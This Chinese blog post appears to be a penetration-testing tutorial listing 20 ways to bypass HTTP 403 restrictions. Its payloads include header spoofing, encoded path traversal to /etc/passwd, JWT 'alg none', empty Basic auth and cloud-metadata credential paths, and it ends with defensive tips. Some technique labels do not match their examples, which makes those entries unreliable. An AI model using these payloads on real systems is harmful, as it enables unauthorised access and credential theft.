20个403 bypass技巧

已于 2025-02-27 10:20:39 修改
阅读量664 收藏 21
点赞数 18
分类专栏: 2025年护网 文章标签: 安全 面试 护网
于 2025-02-26 23:14:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62828084/article/details/145891015
版权

  免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。

在Web渗透测试中,403 Forbidden状态码如同一位沉默的守卫,常常让安全人员陷入困境。这个状态码表明服务器已理解请求,但拒绝执行。本文将从底层协议原理出发,结合攻防对抗案例,系统梳理20种经过实战验证的绕过技巧,帮助安全从业者建立完整的403绕过知识体系。

一、HTTP协议层绕过

  1. 1. 协议降级攻击
    通过强制使用HTTP/1.0协议绕过现代WAF检测:

curl -0 -H "Host: target.com" http://target.com/protected/

原理:部分服务器对旧协议版本的权限校验存在漏洞

  1. 2. 请求方法混淆
    尝试非常规HTTP方法组合:

curl -X PATCH http://target.com/admin
curl -X ARBITRARY http://target.com/config

实测案例:某云存储服务对PROPFIND方法的校验缺失

  1. 3. 端口混淆攻击
    利用非常规服务端口绕过路径限制:

http://target.com:8080/admin -> http://target.com:8443/admin

配合Nmap端口扫描可发现隐藏的管理接口

  1. 4. 协议隧道技术
    通过HTTPS加密通道绕过明文检测:

https://target.com/../http://internal/

需要配合SSRF漏洞使用

  1. 5. 分块编码绕过
    利用Transfer-Encoding头混淆内容长度检测:

requests.post(url, headers={'Transfer-Encoding': 'chunked'}, data="0\r\n\r\n")

二、路径探测艺术

  1. 6. URL标准化绕过

/admin => /ADMIN => /%61dmin => /admin/

Windows系统对大小写不敏感的特性

  1. 7. 双重编码攻击

/%252e%252e%252f => ../ 

多层URL编码混淆检测逻辑

  1. 8. 后缀污染技术

/admin.config => /admin.%20 => /admin..json

利用服务器解析优先级差异

  1. 9. 反向代理路径重构

GET / HTTP/1.1
Host: internal-server:8080

通过修改Host头穿透反向代理

  1. 10. 参数污染攻击

/api?file=legit&file=../../etc/passwd

利用参数解析顺序漏洞

  1. 11. 空字节注入

/admin%00.jpg => /admin.php

PHP特定版本的空字节截断漏洞

三、Header工程学突破

  1. 12. X-Original-URL绕过

GET / HTTP/1.1
X-Original-URL: /admin

适用于Nginx反向代理场景

  1. 13. Referer伪造链

Referer: https://target.com/admin

部分ACL策略存在自引用白名单

  1. 14. X-Forwarded-For欺骗

X-Forwarded-For: 127.0.0.1

利用IP白名单机制缺陷

  1. 15. Content-Type变形

Content-Type: application/x-www-form-urlencoded

强制改变请求体解析方式

四、认证体系突破

  1. 16. Cookie参数污染

Cookie: valid=1; session=xxx

通过添加多余参数绕过正则校验

  1. 17. JWT算法混淆
    修改JWT头部为:

{"alg":"none"}

未正确校验签名算法的典型案例

  1. 18. Basic认证空密码

Authorization: Basic 

部分实现允许空密码访问

五、现代架构突破

  1. 19. GraphQL别名污染

query {
  __schema { 
    types { name }
  }
}

通过内省查询发现隐藏接口

  1. 20. 云元数据接口穿透

GET /latest/meta-data/iam/security-credentials/

AWS/Aliyun元数据服务配置不当

防御体系建设要点

  1. 1. 实施最小权限原则(POLP)

  2. 2. 统一大小写处理策略

  3. 3. 部署深度流量分析系统

  4. 4. 定期进行权限配置审计

  5. 5. 启用动态WAF规则更新

工具推荐:

  • • Burp Suite Intruder(爆破检测)

  • • Nuclei(自动化检测模板)

  • • Wfuzz(路径模糊测试)

  • • JWT_Tool(令牌分析)

一些绕过403的姿势
weixin_45253622的博客
01-16 7497
端口利用 扫描主机端口,找其它开放web服务的端口;访问其端口。 修改HOST 把host值修改为子域名或者ip来绕过。 覆盖请求 URL 尝试使用 X-Original-URL 和 X-Rewrite-URL 标头绕过 Web 服务器的限制。 Request GET /auth/login HTTP/1.1 Response HTTP/1.1 403 Forbidden Reqeust GET / HTTP/1.1 X-Original-URL: /auth/login Re
403bypasser:自动执行403响应代码绕过的过程
05-25
403路人 自动执行403响应代码绕过的过程 描述 我注意到许多#bugbountytips描述了如何绕过403响应代码,因此当我收集所有方法时,我发现我需要40多个请求来处理所有方法。 因此,由于我喜欢自动化,因此我创建了此工具来完成繁重的工作。 但我也建议您稍后需要手动检查 该工具使用三种技术尝试绕过403响应代码,并在彩色输出中给出每次重试的响应代码,以便于阅读: 1-使用多种请求方法(GET-POST- HEAD等) 2-在URL的末尾使用多个有效负载(鸣叫这些提示的人表示敬意) 3-将标头添加到请求(X-Forwarded-Host,X-Host ...等) 安装 : 1- git clone 2 CD 403旁路 3- pip3 install -r requirements.txt 用法 该工具带有两个参数:url-路径 python3 403bypasser.p
403高效绕过目录扫描工具
lza20001103的博客
09-25 588
403高效绕过目录扫描工具
记一次403绕过技巧
mingyqf的博客
04-24 7595
记一次403绕过技巧 文章目录记一次403绕过技巧姿势一: 端口利用姿势二:修改HOST姿势三:覆盖请求URL姿势四:Referer标头绕过姿势五:代理IP姿势六:扩展名绕过 背景 记一次接到客户的一个需求,后台管理地址(https://xxx.xxxx.com)仅允许工作区公出口访问,对于IP的访问限制是否存在缺陷可以绕过,外进行访问返回403状态码。 实战 姿势一: 端口利用 拿到客户给的地址后,首先进行信息收集。端口信息收集,利用nmap进行全端口探测,发现除了80端口之外,还开放了一个web
403 Forbidden错误原因
沐雨金鳞
09-08 608
1、你的IP被列入黑名单。 2、你在一定时间内过多地访问此站(一般是用采集程序),被防火墙拒绝访问了。 3、站域名解析到了空间,但空间未绑定此域名。 4、你的页脚本文件在当前目录下没有执行权限。 5、在不允许写/创建文件的目录中执行了创建/写文件操作。 6、以http方式访问需要ssl连接的址。 7、浏览器不支持SSL 128时访问SSL 128的连接。 8、在身份验证的过程中输入了错误的密码。 9、DNS解析错误,手动更改DNS服务器地址。 10、连接的用户过多,可以过后再试。
bypass-403:一个简单的脚本,仅供旁路403使用
04-13
旁通403 一个简单的脚本,仅供旁路403使用 它也可以用来比较各种条件下的响应,如下图所示 用法 ./bypass-403.sh https://example.com admin ./bypass-403.sh website-here path-here 特征 在卷曲的帮助下使用13个已知的403绕过 安装 git clone https://github.com/iamj0ker/bypass-403 cd bypass-403 chmod +x bypass-403.sh sudo apt install figlet如果您无法看到屏幕截图中的徽标 贡献者
一款针对于403响应的bypass工具-403bypasser
SuperherRo的博客
07-04 2032
403bypasser自动化了用于绕过目标页面上的访问控制限制的技术。
403ByPass总结
热门推荐
LainWith的博客
08-17 1万+
直接访问站如下图,这里使用vulnhub靶机“Y0USEF: 1”为例,介绍几种403ByPass的手段。应该使用方法3探知站,避免全程绕过导致渗透报告上少了漏洞一旦确认403 ByPass如果后期需要BP,直接采用方法3,或者直接方法2(关闭方法3的插件)如果后期不需要BP,直接方法1。...
Bypass_WAF_技巧分享.pdf
08-08
• WAF 简介 • WAF 分类 • WAF 识别 • WAF 绕过方式 • Bypass 利用
bypass_360_meterpreter免杀技巧1
08-03
安全研究人员和攻击者之间的攻防战不断升级,每个新的免杀技巧都会促使反病毒软件进行相应的更新和优化。因此,保持对最新技术和策略的了解,以及不断地实验和创新,是安全领域的重要实践。
enumXFF, 在转发的标头中绕过 403限制,正在枚举 ip.zip
09-18
enumXFF, 在转发的标头中绕过 403限制,正在枚举 ip 你需要做的就是从终端运行该工具,给出以下输入:尝试尝试的页面( http/https://website.com/page )被拒绝时得到的响应的内容长度你希望该工具通过 X-Forwarded-For 尝试的IP范围然后,该
第01篇:WAF Bypass的各种特性和技巧1
08-03
第一章:WAF Bypass技巧第一节:服务器特性在asp+iis的环境中存在一个特性,就是特殊符号%,在该环境下当们我输入s%elect的时候,在WAF层可能
NGS-bypas_inject_nexon_bypass_nexongamesecurity_NGS_
09-29
综上所述,这个压缩包可能是一个针对Nexon游戏的反作弊规避工具,涉及到的技术包括代码注入、调试技巧以及可能的逆向工程。用户需要具备一定的编程基础,特别是对调试器和注入器的使用,才能有效地利用这个工具。...
WAF的正确bypass
10-20
**WAF的正确bypass** 是指在遇到Web应用程序防火墙(Web Application Firewall)时,通过巧妙的方法绕过其安全机制,实现有效测试或安全验证。WAFs设计用于保站免受SQL注入、跨站脚本攻击(XSS)、CSRF等...
403绕过
m0_68636078的博客
07-16 3147
HTTP 403 Forbidden 是一种 HTTP 响应状态代码,表示服务器理解客户端的请求,但拒绝授权访问。权限不足:用户或客户端没有权限访问该资源。IP 黑名单:请求来自被阻止的 IP 地址。请求头部不匹配:例如,User-Agent 或 Referer 不符合服务器的要求。用途:最初用于邮件服务,表示邮件发送者的原始 IP 地址。示例用途:表示远程客户端的 IP 地址。示例用途:表示客户端的 IP 地址。示例用途:通过代理服务器或负载均衡器时,表示原始客户端的 IP 地址。示例用途。
绕过403 403bypass工具
最新发布
weixin_67840381的博客
11-21 475
这是实现了一个基于 Tkinter 的图形用户界面工具,用于进行 HTTP 绕过测试,主要针对 403 禁止访问错误的绕过。工具通过发送多种 HTTP 请求(包括 GET、POST、PUT 等)和应用不同的绕过路径模式(如使用%2e/./等),尝试绕过站的访问控制。
403页面绕过
qq_63980959的博客
02-29 3448
拿到客户给的地址后,首先进行信息收集。端口信息收集,利用nmap进行全端口探测,发现除了80端口之外,还开放了一个web服务的8001端口,我们尝试使用8001端口访问(https://xxx.xxxx.com:8001),总是充满惊喜。可直接绕过IP限制进行访问。怕是这个运维要挨锤了,立马把这个问题,反馈给客户。https://iamadmixxx.xxx.xxx:8001/auth/login通过沟通,由于疏忽未下线8001端口,客户貌似认为这个很简单,关闭8001端口,下线业务后,让我们继续尝试后台能
How To Bypass 403 Error
cnbird's blog
11-20 661
 OK, this tutorial is for ppl like me who use an alternative way of searching for things on internet, EXMPL: instead of typing: www.ubuntu.com/iso, I would go this way: " index of /ISO/Ubuntu " So thi
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值